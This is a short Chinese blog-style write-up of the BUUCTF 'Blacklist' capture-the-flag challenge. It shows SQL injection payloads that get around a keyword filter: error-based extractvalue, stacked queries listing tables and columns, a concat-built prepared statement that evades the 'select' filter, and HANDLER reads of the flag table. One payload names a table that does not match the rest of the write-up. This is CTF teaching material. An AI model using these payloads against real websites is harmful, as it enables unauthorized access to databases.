buuctf-Blacklist

本文通过一个具体的案例展示了如何利用SQL注入漏洞获取敏感信息。详细介绍了使用不同类型的SQL注入技术,包括报错注入、堆叠注入等手段来探索数据库结构,并最终获取目标表中的flag数据。
?inject=1' order by 2--+

过滤了很多关键词,就有select,好像绕不过

试试报错注入

?inject=1' and extractvalue(1,concat(0x7e,(database()),0x7e))--+

数据库:surpersqli 

 因为过滤了太多,报错注入不了,只能试试别的了

堆叠注入

?inject=-1';use supersqli;show tables--+

查出两个表:FlagHere,words 

 接下来查字段:flag,varchar(100),NO

?inject=-1';use supersqli;show columns from FlagHere--+

 然后也可以继续用堆叠注入,对select进行拼接就行,但是我有点不大会,大概就像下面这样的

1';use supersqli;set @sql=concat('s','elect `flag` from `1919810931114514`');PREPARE stmt1 FROM @sql;EXECUTE stmt1;#

还可以用handler读取(知道表名的前提下)

?inject=1';handler FlagHere open;handler  FlagHere read first--+


?inject=1';handler FlagHere open hh;handler hh read first--+


?inject=1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;


//三个都可以,1也可以换成-1
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值